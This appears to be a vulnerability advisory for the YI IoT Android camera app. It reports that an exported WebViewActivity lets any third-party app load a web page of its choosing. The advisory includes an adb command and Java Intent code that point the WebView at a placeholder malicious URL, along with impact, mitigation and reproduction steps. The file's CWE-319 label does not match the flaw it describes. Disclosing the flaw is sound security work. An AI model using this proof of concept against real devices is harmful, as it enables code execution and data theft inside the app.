CWE-319.md

Vulnerability Details

Product: YI IoT 'com.yunyi.smartcamera'   Version: up to 4.1.9_20231127 Vendor: Kami Vision   Component Affected: com.ants360.yicamera.activity.WebViewActivity  

The activity com.ants360.yicamera.activity.WebViewActivity is marked as exported and accepts an implicit Intent, making it accessible from any third-party application. This can be exploited to load a malicious web page in the WebView, leading to remote JavaScript code execution within the context of the application.

### Proof of Concept 1 - ADB Invocation

```bash
adb shell am start -n com.yunyi.smartcamera/com.ants360.yicamera.activity.WebViewActivity -e path "https://www.example.com/maliciousContent"

Proof of Concept 2 - Third-party Android Java Code

Intent intent = new Intent();
intent.setComponent(new ComponentName("com.yunyi.smartcamera", "com.ants360.yicamera.activity.WebViewActivity"));
intent.putExtra("path", "https://www.example.com/maliciousContent");
startActivity(intent);

This Java code snippet demonstrates how a malicious application can invoke the WebViewActivity without any permissions, thereby leveraging the vulnerability.

Impact

The vulnerability does not require any permissions and can be exploited by any third-party application installed on the same device. It could lead to unauthorized access, data theft, or manipulation of user information.

Recommended Mitigations

1. Set android:exported to false for WebViewActivity if it is not meant to be accessed externally.

Steps to Reproduce

1. Install the YI IoT app (version 4.1.7_20231026).
2. Execute the adb command or the Java code provided above.